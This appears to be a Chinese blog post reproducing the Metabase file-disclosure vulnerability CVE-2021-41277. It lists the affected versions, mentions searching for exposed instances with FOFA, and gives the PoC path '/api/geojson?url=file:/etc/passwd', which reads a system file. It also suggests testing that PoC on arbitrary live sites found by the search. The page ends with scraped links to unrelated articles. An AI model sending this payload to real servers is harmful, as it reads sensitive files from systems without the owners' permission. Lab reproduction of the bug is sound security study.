0x00 前置知识

1、metebase

metabase是一款开源的BI分析工具,开发语言clojure+React为主、也有高阶的收费版。 官网:Metabase | Business Intelligence, Dashboards, and Data Visualization 可以利用Metabase进行数据分析,数据可视化,报表生成等。

Metabase介绍_Sshine___的博客-CSDN博客_metabase

2、影响版本:

metabase version < 0.40.5
        metabase version >= 1.0.0, < 1.40.5

0x01 工具

1、docker

kali下对Docker的详细安装_涂寐的博客-CSDN博客_kali安装docker

2、kali

0x02 漏洞复现

1、fofa语法搜索

2、环境搭建

1)创建并运行容器

2)复现

(1)设置一下metebase

(2)随便在刚刚fofa找到的有metebase漏洞的网址,验证poc

/api/geojson?url=file:/etc/passwd

CVE-2021-41277(metebase信息泄漏漏洞复现)相关推荐

  1. 【漏洞通告】Windows 内核信息泄漏漏洞CVE-2021-31955

    漏洞名称 : Windows 内核信息泄漏漏洞 组件名称 : Windows 影响范围 : Windows 10 21h1/20h2/1809/1909/2004 Windows Server 201 ...

  2. 零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113

    零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113 此文章仅供用于学习研究,严禁用于非法用途,否则后果自负. 漏洞简介 零视技术(上海)有限公司是以领先的视 ...

  3. PortSwigger Academy | Information disclosure vulnerabilities : 信息泄漏漏洞

    文章目录 什么是信息披漏? 信息公开的例子有哪些? 如何发现和利用信息披露漏洞 ↓ 信息泄露漏洞如何产生? 信息泄露漏洞的影响是什么? 如何评估信息泄露漏洞的严重性 利用信息公开 ↓ 如何防止信息泄露 ...

  4. linux心跳包检测代码_OpenSSL心跳包越界读敏感信息泄漏漏洞

    发布日期:2014-04-10 CVE ID:CVE-2014-0160 受影响的软件及系统: ==================== OpenSSL 1.0.1-OpenSSL 1.0.1f Op ...

  5. CISCO设备信息泄漏漏洞案例

    前言 在日常的渗透任务中,除了常见的集权设备,高危组件的漏洞挖掘,一些iot设备目标也是可以作为重点关注的存在.近期实战中遇到了几个cisco配置信息泄漏的案例,借此机会复习总结下cisco常见的漏洞 ...

  6. CVE(2017-15715、2021-41773、2021-40438)漏洞复现

    仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...

  7. PHPInfo()信息泄漏漏洞利用及提权

    Simeon PHPInfo函数信息泄露漏洞常发生一些默认的安装包,比如phpstudy等,默认安装完成后,没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php.1.php和test ...

  8. cisco设备信息泄漏漏洞案例【二】

    前言 上一篇文章介绍了cisco路由器设备的2个漏洞案例,这次补充cisco ip电话设备和安全设备的漏洞案例. CISCO-UCM ConfigFileCacheList.txt 泄漏 CISCO- ...

  9. 服务器信息泄漏漏洞,Windows2008 r2“Web服务器HTTP头信息泄露”漏洞修复(示例代码)...

    一.漏洞名称漏洞名称漏洞摘要修复建议 Web服务器HTTP头信息泄露远程Web服务器通过HTTP头公开信息.修改Web服务器的HTTP头以不公开有关底层Web服务器的详细信息. 二.安装IIS 6 管 ...

最新文章

  1. UML建模之数据建模
  2. 数据结构与算法专题——第三题 最长公共子序列
  3. leetcode107. 二叉树的层次遍历 II
  4. 整合基因组学和蛋白质结构的致病机制分析
  5. 【OpenCV应用】python处理行李图像匹配项目——sift函数
  6. 高并发、高性能 Web 架构
  7. 1-22 在“终端”里,运行“top”命令
  8. Jetson TX1开发笔记(三):开发利器-Nsight Eclipse Edition
  9. 转载:住在我隔壁的大学刚毕业的小夫妻
  10. 5.FlashFXP连接失败(连接已拒绝)及530 permission denied(以root用户连接已被客户端关闭)
  11. c语言中的面积和体积计算器,C语言编程问题(面积计算器)——新手问题
  12. PointRCNN:3D Object Proposal Generation and Detection from Point Cloud
  13. 小狗钱钱:钱钱的金钱语录
  14. 学术期刊数据库---EBSCO
  15. PhantomJS将网页保存为图片
  16. butter滤波器是iir吗_MATLAB IIR滤波器设计函数buttord与butter
  17. mysql maven 依赖关系_Maven依赖总结
  18. ib中文文学课如何学习重点?
  19. 榆熙教育:影响拼多多DSR的三点因素介绍
  20. python用什么编译器

热门文章

  1. 愿穷尽一生,探索查理芒格的普世智慧
  2. leetcode 958.二叉树的完全性检验 Java
  3. python 冒泡排序算法
  4. CentOS7 安装 java8(第2次更新:20210403)
  5. IBM朱近之:服务助云计算在中国落地
  6. 黑马程序员JAVA基础-多线程
  7. JPA QuerySyntaxException: unexpected token: xxx near问题解决
  8. 图算法(二十五):子图匹配(Subgraph Matching)【基本的图查询操作,意在发掘图重要的子结构】【适用场景:社交网络分析、群体发现、异常检测】【在一个给定的大图里找到与给定小图同构的子图】
  9. GIS时空大数据融合技术——美丽长岛数据融合
  10. 2021-2027全球与中国超薄柔性玻璃市场现状及未来发展趋势